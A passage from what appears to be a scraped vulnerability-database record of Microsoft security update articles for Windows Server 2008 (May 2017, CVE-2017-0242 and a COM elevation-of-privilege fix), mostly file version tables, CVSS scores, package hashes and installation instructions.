\n \n**Windows Server 2008 file information**\n\n**Note:** The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.\n\nFor all supported ia64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nMsadcf.dll| 6.0.6002.19770| 176,128| 10-Apr-2017| 22:53| IA-64 \nMsadcf.dll| 6.0.6002.24089| 176,128| 07-Apr-2017| 15:17| IA-64 \nMsadcf.dll| 6.0.6002.19770| 73,728| 10-Apr-2017| 23:03| x86 \nMsadcf.dll| 6.0.6002.24089| 73,728| 07-Apr-2017| 15:24| x86 \n \nFor all supported x64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nMsadcf.dll| 6.0.6002.19770| 90,112| 10-Apr-2017| 23:21| x64 \nMsadcf.dll| 6.0.6002.24089| 90,112| 07-Apr-2017| 15:43| x64 \nMsadcf.dll| 6.0.6002.19770| 73,728| 10-Apr-2017| 23:03| x86 \nMsadcf.dll| 6.0.6002.24089| 73,728| 07-Apr-2017| 15:24| x86 \n \nFor all supported x86-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nMsadcf.dll| 6.0.6002.19770| 73,728| 10-Apr-2017| 23:03| x86 \nMsadcf.dll| 6.0.6002.24089| 73,728| 07-Apr-2017| 15:24| x86\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-05-09T07:00:00", "type": "mskb", "title": "Security Update for the Microsoft ActiveX Information Disclosure Vulnerability in Windows Server 2008: May 9, 2017", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, 
"userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0242"], "modified": "2017-05-09T07:00:00", "id": "KB4018927", "href": "https://support.microsoft.com/en-us/help/4018927", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-31T14:39:30", "description": "## Summary\n\nAn elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler. An attacker who successfully exploits the vulnerability could run arbitrary code with elevated privileges. \n \nTo learn more about the vulnerability, go to [the Security Update Guide](<https://portal.msrc.microsoft.com>).\n\n## More Information\n\nImportant\n\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## How to obtain and install the update \n\n### Method 1: Windows Update\n\nThis update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see [Get security updates automatically](<https://www.microsoft.com/en-us/safety/pc-security/updates.aspx>). \n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/search.aspx?q=4018556>) website. 
\n\n\n## Deployment information\n\nFor deployment details for this security update, go to the following article in the Microsoft Knowledge Base: \n[Security update deployment information: May 9, 2017](<http://support.microsoft.com/en-us/help/20170509>)\n\n## More Information\n\nHow to obtain help and support for this security update\n\nHelp for installing updates: [Windows Update FAQ](<http://support.microsoft.com/ph/6527>) \n \nSecurity solutions for IT professionals: [TechNet Security Support and Troubleshooting](<https://technet.microsoft.com/security/bb980617.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Microsoft Secure](<http://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>) \n\n\nFile Information\n\nFile hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nWindows6.0-KB4018556-ia64.msu| 78887F2993AED4D8DCEBA958A362134E40F5B116| 8996176D602E9F25899C25CCD9052404F3CCB02FBC265BB38D4A29DFA6A61B2C \nWindows6.0-KB4018556-x64.msu| 4728E8EAC4BD21D2F037349A59540EF40888177D| F399A7F1A58A299C10C72E206665CD23C0182E339F128A4E3835D6DC0ADF3546 \nWindows6.0-KB4018556-x86.msu| 7766800F74B02A4062E52BE4F39B4BB1C17E9849| 254A546922E4052BC2DD0036C67AABED643E6A2F8182C1D1663C9F1582DE1EA6 \n \n \n**File information** \nThe English (United States) version of this software update installs files that have the attributes that are listed in the following tables. 
\n \n**Windows Server 2008 file information** \n\n**Note:** The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.\n\nFor all supported x64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform**| **Service branch** \n---|---|---|---|---|---|--- \nOle32.dll.mui| 6.0.6002.24089| 3,072| 
07-Apr-2017| 16:46| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,992| 07-Apr-2017| 16:49| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:53| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 23,040| 07-Apr-2017| 16:57| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:54| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 24,064| 07-Apr-2017| 16:57| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 15:44| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,480| 07-Apr-2017| 15:46| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:56| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 22,528| 07-Apr-2017| 17:00| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:55| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 19,968| 07-Apr-2017| 16:58| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:46| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 24,064| 07-Apr-2017| 16:49| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:47| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 16,384| 07-Apr-2017| 16:50| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:47| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 22,528| 07-Apr-2017| 16:51| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 17:00| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 23,552| 07-Apr-2017| 17:04| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 17:00| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 13,824| 07-Apr-2017| 17:03| Not applicable| Not applicable 
\nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:52| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 12,800| 07-Apr-2017| 16:55| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 17:00| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,480| 07-Apr-2017| 17:03| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:59| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 22,016| 07-Apr-2017| 17:03| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:46| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 22,528| 07-Apr-2017| 16:50| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:55| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 22,016| 07-Apr-2017| 16:58| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:57| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 22,016| 07-Apr-2017| 16:59| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:53| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,480| 07-Apr-2017| 16:56| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:54| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 19,968| 07-Apr-2017| 16:57| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:56| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 19,456| 07-Apr-2017| 16:59| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:49| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 9,728| 07-Apr-2017| 16:54| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:51| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 9,728| 07-Apr-2017| 16:55| Not 
applicable| Not applicable \nComcat.dll| 6.0.6000.16386| 8,704| 02-Nov-2006| 11:16| x64| Not applicable \nOleres.dll| 6.0.6002.19773| 23,552| 14-Apr-2017| 19:20| x64| Not applicable \nComcat.dll| 6.0.6002.24089| 8,704| 07-Apr-2017| 15:42| x64| Not applicable \nOleres.dll| 6.0.6002.24089| 23,552| 07-Apr-2017| 14:55| x64| Not applicable \nCsrsrv.dll| 6.0.6002.19680| 86,016| 12-Aug-2016| 19:07| x64| Not applicable \nCsrsrv.dll| 6.0.6002.24089| 86,016| 07-Apr-2017| 15:42| x64| Not applicable \nKernel32.dll| 6.0.6002.19623| 1,212,928| 18-Mar-2016| 18:14| x64| Not applicable \nKernel32.dll| 6.0.6002.24089| 1,214,976| 07-Apr-2017| 15:43| x64| Not applicable \nNtdll.dll| 6.0.6002.19623| 1,589,168| 21-Mar-2016| 23:00| x64| Not applicable \nNtdll.dll| 6.0.6002.24089| 1,583,512| 11-Apr-2017| 04:07| x64| Not applicable \nOleaut32.dll| 6.0.6002.19773| 861,696| 14-Apr-2017| 20:38| x64| Not applicable \nOleaut32.dll| 6.0.6002.24089| 862,208| 07-Apr-2017| 15:43| x64| Not applicable \nNtoskrnl.exe| 6.0.6002.19764| 4,693,736| 06-Apr-2017| 16:21| x64| Not applicable \nNtoskrnl.exe| 6.0.6002.24089| 4,665,064| 07-Apr-2017| 15:50| x64| Not applicable \nRpcrt4.dll| 6.0.6002.19598| 1,304,576| 06-Feb-2016| 02:01| x64| Not applicable \nRpcrt4.dll| 6.0.6002.24089| 1,308,160| 07-Apr-2017| 15:44| x64| Not applicable \nSmss.exe| 6.0.6002.19598| 75,264| 06-Feb-2016| 00:48| x64| Not applicable \nSmss.exe| 6.0.6002.24089| 75,776| 07-Apr-2017| 14:43| x64| Not applicable \nNtvdm64.dll| 6.0.6002.19598| 16,896| 06-Feb-2016| 02:01| x64| AMD64_MICROSOFT-WINDOWS-WOW \nWow64.dll| 6.0.6002.19598| 234,496| 06-Feb-2016| 02:02| x64| AMD64_MICROSOFT-WINDOWS-WOW \nWow64cpu.dll| 6.0.6002.19598| 17,408| 06-Feb-2016| 02:02| x64| AMD64_MICROSOFT-WINDOWS-WOW \nWow64win.dll| 6.0.6002.19598| 301,568| 06-Feb-2016| 02:02| x64| AMD64_MICROSOFT-WINDOWS-WOW \nNtvdm64.dll| 6.0.6002.24089| 16,896| 07-Apr-2017| 15:43| x64| AMD64_MICROSOFT-WINDOWS-WOW \nWow64.dll| 6.0.6002.24089| 234,496| 07-Apr-2017| 15:44| x64| 
AMD64_MICROSOFT-WINDOWS-WOW \nWow64cpu.dll| 6.0.6002.24089| 17,408| 07-Apr-2017| 15:44| x64| AMD64_MICROSOFT-WINDOWS-WOW \nWow64win.dll| 6.0.6002.24089| 301,568| 07-Apr-2017| 15:44| x64| AMD64_MICROSOFT-WINDOWS-WOW \nComcat.dll| 6.0.6000.16386| 7,168| 02-Nov-2006| 09:46| x86| Not applicable \nOleres.dll| 6.0.6002.19773| 23,552| 14-Apr-2017| 19:01| x86| Not applicable \nComcat.dll| 6.0.6002.24089| 7,168| 07-Apr-2017| 15:23| x86| Not applicable \nOleres.dll| 6.0.6002.24089| 23,552| 07-Apr-2017| 14:31| x86| Not applicable \nKernel32.dll| 6.0.6002.19623| 861,696| 18-Mar-2016| 17:10| x86| Not applicable \nKernel32.dll| 6.0.6002.24089| 862,720| 07-Apr-2017| 15:25| x86| Not applicable \nNtdll.dll| 6.0.6002.19623| 1,171,488| 21-Mar-2016| 23:00| x86| Not applicable \nNtdll.dll| 6.0.6002.24089| 1,167,880| 11-Apr-2017| 04:07| x86| Not applicable \nOleaut32.dll| 6.0.6002.19773| 574,464| 14-Apr-2017| 20:31| x86| Not applicable \nOleaut32.dll| 6.0.6002.24089| 574,464| 07-Apr-2017| 15:24| x86| Not applicable \nRpcrt4.dll| 6.0.6002.19598| 679,424| 06-Feb-2016| 02:12| x86| Not applicable \nRpcrt4.dll| 6.0.6002.24089| 678,912| 07-Apr-2017| 15:25| x86| Not applicable \nAcwow64.dll| 6.0.6002.19598| 43,008| 06-Feb-2016| 02:11| x86| WOW64_MICROSOFT-WINDOWS-WOW \nInstnm.exe| 6.0.6002.19598| 7,680| 06-Feb-2016| 00:32| x86| WOW64_MICROSOFT-WINDOWS-WOW \nNtvdm64.dll| 6.0.6002.19598| 14,336| 06-Feb-2016| 02:12| x86| WOW64_MICROSOFT-WINDOWS-WOW \nSetup16.exe| 3.1.0.1918| 26,112| 06-Feb-2016| 00:32| x86| WOW64_MICROSOFT-WINDOWS-WOW \nUser.exe| 6.0.6002.19598| 2,560| 06-Feb-2016| 00:32| x86| WOW64_MICROSOFT-WINDOWS-WOW \nWow32.dll| 6.0.6002.19598| 5,120| 06-Feb-2016| 02:12| x86| WOW64_MICROSOFT-WINDOWS-WOW \nAcwow64.dll| 6.0.6002.24089| 43,008| 07-Apr-2017| 15:22| x86| WOW64_MICROSOFT-WINDOWS-WOW \nInstnm.exe| 6.0.6002.24089| 7,680| 07-Apr-2017| 14:22| x86| WOW64_MICROSOFT-WINDOWS-WOW \nNtvdm64.dll| 6.0.6002.24089| 14,336| 07-Apr-2017| 15:24| x86| WOW64_MICROSOFT-WINDOWS-WOW \nSetup16.exe| 
3.1.0.1918| 26,112| 07-Apr-2017| 14:22| x86| WOW64_MICROSOFT-WINDOWS-WOW \nUser.exe| 6.0.6002.24089| 2,560| 07-Apr-2017| 14:22| x86| WOW64_MICROSOFT-WINDOWS-WOW \nWow32.dll| 6.0.6002.24089| 5,120| 07-Apr-2017| 15:25| x86| WOW64_MICROSOFT-WINDOWS-WOW \nAdvapi32.dll.mui| 6.0.6002.19598| 380,928| 06-Feb-2016| 02:53| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 04:12| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 04:00| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 04:17| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 401,408| 06-Feb-2016| 04:09| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 266,240| 06-Feb-2016| 02:20| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 03:09| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 04:03| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 02:57| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 376,832| 06-Feb-2016| 04:06| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 03:59| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 03:00| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 360,448| 06-Feb-2016| 03:28| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 360,448| 06-Feb-2016| 04:53| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 02:53| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 03:06| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 03:04| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 04:14| Not applicable| Not applicable \nAdvapi32.dll.mui| 
6.0.6002.19598| 389,120| 06-Feb-2016| 04:37| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 04:58| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 03:53| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 03:11| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 356,352| 06-Feb-2016| 03:48| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 348,160| 06-Feb-2016| 04:33| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 380,928| 07-Apr-2017| 16:39| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 389,120| 07-Apr-2017| 16:49| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:39| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:36| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 401,408| 07-Apr-2017| 16:34| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 266,240| 07-Apr-2017| 15:34| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 393,216| 07-Apr-2017| 16:48| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:46| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 393,216| 07-Apr-2017| 16:48| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 376,832| 07-Apr-2017| 16:29| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 393,216| 07-Apr-2017| 16:42| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 389,120| 07-Apr-2017| 16:43| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 360,448| 07-Apr-2017| 16:43| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 360,448| 07-Apr-2017| 16:37| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:36| Not applicable| Not applicable 
\nAdvapi32.dll.mui| 6.0.6002.24089| 389,120| 07-Apr-2017| 16:45| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 393,216| 07-Apr-2017| 16:47| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 389,120| 07-Apr-2017| 16:59| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 389,120| 07-Apr-2017| 16:58| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 393,216| 07-Apr-2017| 16:57| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:51| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:37| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 356,352| 07-Apr-2017| 16:52| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 348,160| 07-Apr-2017| 16:44| Not applicable| Not applicable \nAdvapi32.dll| 6.0.6002.19598| 802,304| 06-Feb-2016| 02:11| x86| Not applicable \nAdvapi32.dll| 6.0.6002.24089| 802,816| 07-Apr-2017| 15:22| x86| Not applicable \nOle32.dll| 6.0.6002.19773| 1,321,472| 14-Apr-2017| 20:31| x86| X86_MICROSOFT-WINDOWS-COM-BASE-QFE \nOle32.dll| 6.0.6002.24089| 1,318,912| 07-Apr-2017| 15:24| x86| X86_MICROSOFT-WINDOWS-COM-BASE-QFE \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Dec-2006| 03:28| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 24,576| 14-Apr-2017| 21:30| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 08-Jan-2007| 19:48| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:33| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 21-Nov-2006| 03:27| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:34| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 09:48| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:30| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 
3,584| 05-Jan-2007| 03:25| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:34| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 09:50| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 20:31| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 10:43| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:34| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 27-Nov-2006| 21:37| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:29| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 10:43| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:36| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 13-Dec-2006| 22:22| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 24,576| 14-Apr-2017| 21:21| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 16-Jan-2007| 03:26| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:22| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Nov-2006| 23:28| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:21| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 09:48| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 24,576| 14-Apr-2017| 21:19| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 07-Nov-2006| 03:40| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 20,480| 14-Apr-2017| 21:29| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 21-Nov-2006| 03:27| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:24| Not applicable| Not applicable 
\nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 10:52| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:23| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Dec-2006| 03:28| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:24| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Nov-2006| 23:23| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:28| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 18-Jan-2007| 03:20| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:26| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 09-Nov-2006| 03:58| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:31| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 21-Nov-2006| 03:27| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:28| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Jan-2007| 03:32| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:26| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Nov-2006| 23:23| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 20,480| 14-Apr-2017| 21:33| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 08-Nov-2006| 07:09| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 20,480| 14-Apr-2017| 21:27| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:21| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 24,576| 07-Apr-2017| 16:25| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:36| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:39| Not 
applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:21| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:24| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:19| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:22| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:18| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:20| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 15:25| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 15:27| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:34| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:37| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:33| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:36| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:33| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:37| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:18| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 24,576| 07-Apr-2017| 16:20| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:26| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:31| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:27| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:32| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:32| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 24,576| 
